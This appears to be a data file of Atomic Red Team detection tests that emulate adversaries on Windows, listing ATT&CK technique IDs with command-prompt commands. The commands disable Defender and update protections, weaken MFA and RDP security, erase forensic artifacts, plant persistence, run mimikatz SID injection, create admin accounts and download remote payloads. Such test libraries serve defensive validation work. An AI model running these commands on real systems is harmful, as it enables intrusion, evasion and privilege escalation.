reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows Auto Update Option to Notify before download
Modify Registry
Windows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Do Not Connect To Win Update
Modify Registry
Do Not Connect To Win Update. Redline is using this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Tamper Win Defender Protection
Modify Registry
Tamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry. Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that tries to tamper this Win Defender feature settings.
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Allow Simultaneous Download Registry
Modify Registry
A registry modification to allow Simultaneous download in the system.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
T1112 command_prompt windows Modify Internet Zone Protocol Defaults in Current User Registry - cmd
Modify Registry
This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed. To verify the effects of the test: 1. Open the Registry Editor (regedit.exe). 2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults". 3. Check for the presence of the "http" and "https" DWORD values set to 0. Or run: ``batch reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" ``
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F
T1112 command_prompt windows Activities To Disable Secondary Authentication Detected By Modified Registry Value.
Modify Registry
Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data. See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 0 /f
T1112 command_prompt windows Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
Modify Registry
Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks. See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 0 /f
T1112 command_prompt windows Scarab Ransomware Defense Evasion Activities
Modify Registry
Scarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues. [Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
T1112 command_prompt windows Disable Remote Desktop Anti-Alias Setting Through Registry
Modify Registry
A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
T1112 command_prompt windows Disable Remote Desktop Security Settings Through Registry
Modify Registry
A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
T1112 command_prompt windows Disabling ShowUI Settings of Windows Error Reporting (WER)
Modify Registry
A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
T1112 command_prompt windows Enable Proxy Settings
Modify Registry
A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
T1112 command_prompt windows Set-Up Proxy Server
Modify Registry
A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
T1112 command_prompt windows RDP Authentication Level Override
Modify Registry
A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Enable RDP via Registry (fDenyTSConnections)
Modify Registry
Modify the registry value of fDenyTSConnections to allow incoming RDP connections. This activity has been observed by multiple ransomware groups, including Hive ransomware. [Reference](https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Windows Prefetch Through Registry
Modify Registry
Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Flush Shimcache
Modify Registry
The ShimCache is a component in Windows operating systems that stores information about recently executed applications. It is used by the operating system to speed up the launching process of applications. The ShimCache is also used by IR teams and Forensic teams. Forensic investigators can use the ShimCache to determine which programs have been executed on a system, even if they have been deleted or their logs have been cleared.Reference : https://blueteamops.medium.com/shimcache-flush-89daff28d15e
Rundll32.exe apphelp.dll,ShimFlushCache
T1112 command_prompt elevated windows Disable Windows Remote Desktop Protocol
Modify Registry
Modify the registry of the machine to disable remote desktop protocol.
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Enforce Smart Card Authentication Through Registry
Modify Registry
Enforce Smart Card Authentication Through Registry
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Requires the BitLocker PIN for Pre-boot authentication
Modify Registry
Requires the BitLocker PIN for Pre-boot authentication
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify EnableBDEWithNoTPM Registry entry
Modify Registry
Allow BitLocker without a compatible TPM (requires a password)
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify UseTPM Registry entry
Modify Registry
Use Trusted Platform Module (TPM) for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMPIN Registry entry
Modify Registry
Allow startup PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMKey Registry entry
Modify Registry
Allow startup key with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMKeyPIN Registry entry
Modify Registry
Allow startup key and PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify EnableNonTPM Registry entry
Modify Registry
Allow Bitlocker without TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify UsePartialEncryptionKey Registry entry
Modify Registry
Allow startup key with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UsePIN Registry entry
Modify Registry
Allow startup PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Abusing Windows TelemetryController Registry Key for Persistence
Modify Registry
The Windows Compatibility Telemetry system makes use of the CompatTelRunner.exe binary to run a variety of telemetry tasks. It relies on the registry for instructions on which commands to run. It will run any arbitrary command without restriction of location or type. Blog :https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /t REG_SZ /v Command /d #{new_executable} /f
T1112 command_prompt elevated windows Modify RDP-Tcp Initial Program Registry Entry
Modify Registry
If the fInheritInitialProgram value is set to 1, the exe indicated in the InitialProgram value is automatically started on RDP connection. Once the test commands are run, notepad will execute automatically on new RDP connection
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fInheritInitialProgram /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Cleanup Path for Persistence
Modify Registry
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Fragmentation Path for Persistence
Modify Registry
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Backup Path for Persistence
Modify Registry
Replacing the registry settings with custom executable will end up with the replacement programs being executed at the time OS will decide to kick off the respective activity
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Adding custom paths for application execution
Modify Registry
As per Microsoft,the entries found under App Paths are used primarily to map an application’s executable file name to that file’s fully qualified path and to pre-pend information to the PATH environment variable on a per-application, per-process basis. The path can be modified to load a custom application of choice. Post the registry changes of this test, when someone tries to manually run msedge.exe via StartMenu/Run window , notepad will be launched.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d #{new_path} /f
T1115 command_prompt windows Utilize Clipboard to store or execute commands from
Clipboard Data
Add data to clipboard to copy off or execute commands from.
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
T1119 command_prompt windows Automated Collection Command Prompt
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected.
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection
T1119 command_prompt windows Recon information for export with Command Prompt
Automated Collection
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected.
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
T1120 command_prompt windows Peripheral Device Discovery via fsutil
Peripheral Device Discovery
Performs pheripheral device discovery utilizing fsutil to list all drives.
fsutil fsinfo drives
T1123 command_prompt windows Registry artefact when application use microphone
Audio Capture
[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
T1124 command_prompt windows System Time Discovery
System Time Discovery
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
net time \\#{computer_name}
w32tm /tz
T1124 command_prompt windows System Time Discovery W32tm as a Delay
System Time Discovery
identifies DCRat delay time tactics using w32tm. https://research.splunk.com/endpoint/b2cc69e7-11ba-42dc-a269-59c069a48870/ https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
W32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
T1124 command_prompt windows System Time with Windows time Command
System Time Discovery
Displays the current system time via the Windows builtin time command: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/time Recently observed in use in the wild during an incident involving Ursnif malware: https://github.com/The-DFIR-Report/Sigma-Rules/blob/dc72f0b557fc63347379be0a33439788256761c8/rules/windows/process_creation/proc_creation_win_system_time_lookup.yml https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
time
T1124 command_prompt windows Discover System Time Zone via Registry
System Time Discovery
Identify the Operating System Time Zone via registry with the reg.exe command. Upon execution, the system Time Zone will be shown.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation" /v TimeZoneKeyName
T1125 command_prompt windows Registry artefact when application use webcam
Video Capture
[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
T1127 command_prompt windows Lolbin Jsc.exe compile javascript to exe
Trusted Developer Utilities Proxy Execution
Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/
copy "#{filename}" %TEMP%\hello.js
#{jscpath}\#{jscname} %TEMP%\hello.js
T1127 command_prompt windows Lolbin Jsc.exe compile javascript to dll
Trusted Developer Utilities Proxy Execution
Use jsc.exe to compile javascript code stored in Library.js and output Library.dll. https://lolbas-project.github.io/lolbas/Binaries/Jsc/ https://www.phpied.com/make-your-javascript-a-windows-exe/
copy "#{filename}" %TEMP%\LibHello.js
#{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
T1127.001 command_prompt windows MSBuild Bypass Using Inline Tasks (C#)
MSBuild
Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen.
#{msbuildpath}\#{msbuildname} "#{filename}"
T1127.001 command_prompt windows MSBuild Bypass Using Inline Tasks (VB)
MSBuild
Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen.
#{msbuildpath}\#{msbuildname} "#{filename}"
T1129 command_prompt windows ESXi - Install a custom VIB on an ESXi host
Shared Modules
An adversary can maintain persistence within an ESXi host by installing malicious vSphere Installation Bundles (VIBs). [Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence)
#{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"
T1134.005 command_prompt elevated windows Injection SID-History with mimikatz
SID-History Injection
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. Must be run on domain controller
#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject} /sam:#{sam_account_name}" "exit"
T1135 command_prompt windows Network Share Discovery command prompt
Network Share Discovery
Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution available network shares will be displayed in the powershell session
net view \\#{computer_name}
T1135 command_prompt windows View available share drives
Network Share Discovery
View information about all of the resources that are shared on the local computer Upon execution, available share drives will be displayed in the powershell session
net share
T1135 command_prompt windows Network Share Discovery via dir command
Network Share Discovery
Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip Upon execution available network shares will be displayed in the commandline session
dir \\#{computer_ip}\c$
dir \\#{computer_ip}\admin$
dir \\#{computer_ip}\IPC$
T1136.001 command_prompt elevated windows Create a new user in a command prompt
Local Account
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD"
net user /add "#{username}" "#{password}"
T1136.001 command_prompt elevated windows Create a new Windows admin user
Local Account
Creates a new admin user in a command prompt.
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
T1136.002 command_prompt windows Create a new Windows domain admin user
Domain Account
Creates a new domain admin user in a command prompt.
net user "#{username}" "#{password}" /add /domain
net group "#{group}" "#{username}" /add /domain
T1136.002 command_prompt windows Create a new account similar to ANONYMOUS LOGON
Domain Account
Create a new account similar to ANONYMOUS LOGON in a command prompt.
net user "#{username}" "#{password}" /add /domain
T1137 command_prompt windows Office Application Startup - Outlook as a C2
Office Application Startup
As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '1' - A file called VbaProject.OTM must be created in the Outlook Folder.
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /v Level /t REG_DWORD /d 1 /f
mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
T1137.004 command_prompt windows Install Outlook Home Page Persistence
Outlook Home Page
This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox).
reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
T1140 command_prompt windows Deobfuscate/Decode Files Or Information
Deobfuscate/Decode Files or Information
Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder
certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe
T1140 command_prompt windows Certutil Rename and Decode
Deobfuscate/Decode Files or Information
Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -encode #{executable} %temp%\T1140_calc2.txt
%temp%\tcm.tmp -decode %temp%\T1140_calc2.txt %temp%\T1140_calc2_decoded.exe
T1140 command_prompt windows Expand CAB with expand.exe
Deobfuscate/Decode Files or Information
Uses expand.exe to extract a file from a CAB created locally. This simulates adversarial use of expand on cabinet archives. Upon success, art-expand-source.txt is extracted next to the CAB.
mkdir "#{output_dir}" >nul 2>&1
echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
pushd "#{output_dir}"
expand "#{cab_path}" -F:* .
popd
T1195 command_prompt windows Octopus Scanner Malware Open Source Supply Chain
Supply Chain Compromise
This test simulates an adversary Octopus drop the RAT dropper ExplorerSync.db [octopus-scanner-malware-open-source-supply-chain](https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain/) [the-supreme-backdoor-factory](https://www.dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/)
copy %temp%\ExplorerSync.db %temp%\..\Microsoft\ExplorerSync.db
schtasks /create /tn ExplorerSync /tr "javaw -jar %temp%\..\Microsoft\ExplorerSync.db" /sc MINUTE /f
T1197 command_prompt windows Bitsadmin Download (cmd)
BITS Jobs
This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
T1197 command_prompt windows Persist, Download, & Execute
BITS Jobs
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed.
bitsadmin.exe /create #{bits_job_name}
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
bitsadmin.exe /resume #{bits_job_name}
ping -n 5 127.0.0.1 >nul 2>&1
bitsadmin.exe /complete #{bits_job_name}
T1197 command_prompt windows Bits download using desktopimgdownldr.exe (cmd)
BITS Jobs
This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
T1201 command_prompt windows Examine local password policy - Windows
Password Policy Discovery
Lists the local password policy to console on Windows.
net accounts
T1201 command_prompt windows Examine domain password policy - Windows
Password Policy Discovery
Lists the domain password policy to console on Windows.
net accounts /domain
T1201 command_prompt elevated windows Use of SecEdit.exe to export the local security policy (including the password policy)
Password Policy Discovery
SecEdit.exe can be used to export the current local security policy applied to a host. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
secedit.exe /export /areas SECURITYPOLICY /cfg output_mysecpol.txt
T1202 command_prompt windows Indirect Command Execution - pcalua.exe
Indirect Command Execution
The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open
pcalua.exe -a #{process}
pcalua.exe -a #{payload_path}
T1202 command_prompt windows Indirect Command Execution - forfiles.exe
Indirect Command Execution
forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Forfiles.yml) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened.
forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
T1202 command_prompt windows Indirect Command Execution - conhost.exe
Indirect Command Execution
conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)
conhost.exe "#{process}"
T1204.002 command_prompt windows OSTap Payload Download
Malicious File
Uses cscript //E:jscript to download a file
echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}
T1216 command_prompt windows SyncAppvPublishingServer Signed Script PowerShell Command Execution
System Script Proxy Execution
Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched.
C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
T1216 command_prompt windows manage-bde.wsf Signed Script Command Execution
System Script Proxy Execution
Executes the signed manage-bde.wsf script with options to execute an arbitrary command.
set comspec=#{command_to_execute}
cscript %windir%\System32\manage-bde.wsf
T1216.001 command_prompt windows PubPrn.vbs Signed Script Bypass
PubPrn
Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
T1217 command_prompt windows List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt
Browser Information Discovery
Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed.
where /R C:\Users\ Bookmarks
T1217 command_prompt windows List Mozilla Firefox bookmarks on Windows with command prompt
Browser Information Discovery
Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed.
where /R C:\Users\ places.sqlite
T1217 command_prompt windows List Internet Explorer Bookmarks using the command prompt
Browser Information Discovery
This test will list the bookmarks for Internet Explorer that are found in the Favorites folder
dir /s /b %USERPROFILE%\Favorites
T1218 command_prompt elevated windows mavinject - Inject DLL into running process
System Binary Proxy Execution
Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.
mavinject.exe #{process_id} /INJECTRUNNING "#{dll_payload}"
T1218 command_prompt windows Register-CimProvider - Execute evil dll
System Binary Proxy Execution
Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB
C:\Windows\SysWow64\Register-CimProvider.exe -Path "#{dll_payload}"
T1218 command_prompt windows InfDefaultInstall.exe .inf Execution
System Binary Proxy Execution
Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
InfDefaultInstall.exe "#{inf_to_execute}"
T1218 command_prompt windows ProtocolHandler.exe Downloaded a Suspicious File
System Binary Proxy Execution
Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b
call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
T1218 command_prompt windows Load Arbitrary DLL via Wuauclt (Windows Update Client)
System Binary Proxy Execution
This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. See https://dtm.uk/wuauclt/
wuauclt.exe /UpdateDeploymentProvider "#{arbitrary_dll}" /RunHandlerComServer
T1218 command_prompt windows Lolbin Gpscript logon option
System Binary Proxy Execution
Executes logon scripts configured in Group Policy. https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Gpscript /logon
T1218 command_prompt windows Lolbin Gpscript startup option
System Binary Proxy Execution
Executes startup scripts configured in Group Policy https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Gpscript /startup
T1218 command_prompt windows Lolbas ie4uinit.exe use as proxy
System Binary Proxy Execution
Executes commands from a specially prepared ie4uinit.inf file. Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
copy #{Path_ie4uinit} %TEMP%\ie4uinit.exe
copy "#{Path_inf}" %TEMP%\ieuinit.inf
%TEMP%\ie4uinit.exe -BaseSettings
